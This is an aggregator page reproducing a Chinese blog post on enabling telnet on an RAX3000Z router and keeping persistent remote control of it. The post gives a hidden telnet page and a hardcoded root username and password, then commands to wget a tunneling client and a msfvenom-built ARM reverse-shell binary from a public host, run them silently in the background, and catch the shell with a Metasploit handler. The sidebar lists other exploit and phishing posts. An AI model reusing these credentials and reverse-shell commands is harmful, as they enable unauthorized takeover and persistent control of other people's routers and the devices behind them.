惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Engineering at Meta
Engineering at Meta
博客园_首页
H
Help Net Security
WordPress大学
WordPress大学
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
罗磊的独立博客
博客园 - 三生石上(FineUI控件)
B
Blog
I
InfoQ
SecWiki News
SecWiki News
T
Tailwind CSS Blog
Spread Privacy
Spread Privacy
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
Vulnerabilities – Threatpost
N
Netflix TechBlog - Medium
P
Palo Alto Networks Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Vercel News
Vercel News
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
K
Kaspersky official blog
M
MIT News - Artificial intelligence
S
Schneier on Security
T
Threat Research - Cisco Blogs
F
Fortinet All Blogs
Cyberwarzone
Cyberwarzone
Scott Helme
Scott Helme
aimingoo的专栏
aimingoo的专栏
Martin Fowler
Martin Fowler
MyScale Blog
MyScale Blog
The Cloudflare Blog
Recent Announcements
Recent Announcements
Security Latest
Security Latest
G
GRAHAM CLULEY
IT之家
IT之家
Y
Y Combinator Blog
The Last Watchdog
The Last Watchdog
腾讯CDC
Google DeepMind News
Google DeepMind News
V
V2EX
S
Securelist
TaoSecurity Blog
TaoSecurity Blog
B
Blog RSS Feed
S
SegmentFault 最新的问题
博客园 - 叶小钗
P
Proofpoint News Feed
云风的 BLOG
云风的 BLOG
Project Zero
Project Zero
G
Google Developers Blog
Google DeepMind News
Google DeepMind News
F
Full Disclosure

博客园 - r1ch4rd_L

内网搭建KMS激活windows与office “Chrome139.0.7258.128版本GPU硬件加速错误导致UI加载失败”问题临时解决方案 明源相关漏洞自查清单(2025) 用友相关漏洞自查表(2025年) 亿邮相关漏洞总结 突发,广东广州电信把github地址解析成为127.0.0.1 Sysmon立大功,分析短进程,阻止右下角芒果TV弹框 分析一个Steam钓鱼骗局,附带相关恶意样本 分析一个steam假入库行为,附带相关恶意样本 辣鸡CSDN 捕获挖矿脚本分析 apache2.4.49RCE漏洞抓鸡(CVE-2021-41773_CVE-2021-42013) 多种shiro利用方式总结 【钓鱼可用】文件名反转字符串 SonicWALL SSL-VPN Web Server Vulnerable Exploit - r1ch4rd_L ES文件浏览器4.1.9.7.4任意文件浏览漏洞 SUID提权之python的os.setuid(0)提权 PHP-8.1.0-dev 后门命令执行 windows命令行工具导出系统日志——wevtutil 金蝶EAS接口未授权 (蓝队4月10日捕捉疑似0day)
RAX3000Z路由器开启telnet功能并在互联网侧实现持久化控制
r1ch4rd_L · 2026-04-03 · via 博客园 - r1ch4rd_L

RAX3000Z路由器cpu架构:armv7l,软件版本:RAX3000-ZXW.ZD.06,硬件版本:HV4.0.0

image

2c001bad-bb76-472d-bd45-a306c40dc350

开telnet功能:
1.先user用户登录192.168.10.1
2.http://192.168.10.1/ch/telnet.html打开telnet开关
3.账号:CMCCAdmin,密码:wE%AnmFq,进去就是root权限

其他功能:
http://192.168.10.1/randddebug.html是在线升级页面
http://192.168.10.1/ch/router_info.html是主机信息。

内网穿透:
公网机用python起http服务,可供下载vnt-arm-v7
路由器wget 公网机/vnt-cli
路由器后台静默运行vnt:/usr/bin/nohup /var/vnt-cli -s 公网机:端口 -k key> /dev/null 2>&1 &


公网机用msf生成后门:
msfvenom -p linux/armle/shell_reverse_tcp LHOST=公网机 LPORT=监听端口 -f elf -o basic_shell.elf

公网机起http服务提供下载后门,wget 公网机/basic_shell.elf

公网机起msf运行参数:
use exploit/multi/handler
set payload linux/armle/shell_reverse_tcp
set lhost 公网机
set lport 监听端口

image

作用:实现路由器的持久化控制,无论走到哪,都能控制路由器下联的设备通断

踩过的坑:

1、各种尝试,无法开启ftp和ssh功能;

2、linux/armle/meterpreter/reverse_tcp不稳定一连即断,最好用linux/armle/shell_reverse_tcp,不稳定的原因大概率是路由器缺少运行 Meterpreter 所需的动态库。